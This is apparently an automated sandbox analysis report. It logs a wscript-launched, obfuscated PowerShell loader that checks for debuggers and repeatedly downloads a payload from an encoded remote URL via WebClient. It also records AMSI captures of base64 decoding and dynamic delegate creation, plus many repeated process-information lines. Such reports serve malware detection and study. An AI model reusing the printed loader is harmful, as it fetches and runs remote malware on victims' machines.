                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Retransmissive $Tape $Gildningen), (Ekstravagerer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Outpresses = [AppDomain]::CurrentDomain.GetAssemblies()$g
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Garboils)), $Drivgarnsfiskerierseetroot).DefineDynamicModule($Turnxw202, $false).DefineType($villigstes, $cyphellae, [System.Multicast
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($stokesia)$glObal:SPkKEDe = [SysTem.texT.EnCODinG]::ASciI.GetStrINg($SENgenE)$GLOBaL:MulTibirtH=$spkKede.sUbsTrING($koNtoraSsiSTENtenS153,$FEjldIsponeRES)<#Borgerhusenes Engenderment
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');GerminJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E8C4B0 push eax; iretd 4_2_00007FF848E8C4D1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F593F8 pushad ; retf 4_2_00007FF848F593F9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04ADCCC8 pushfd ; ret 6_2_04ADCCC9
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
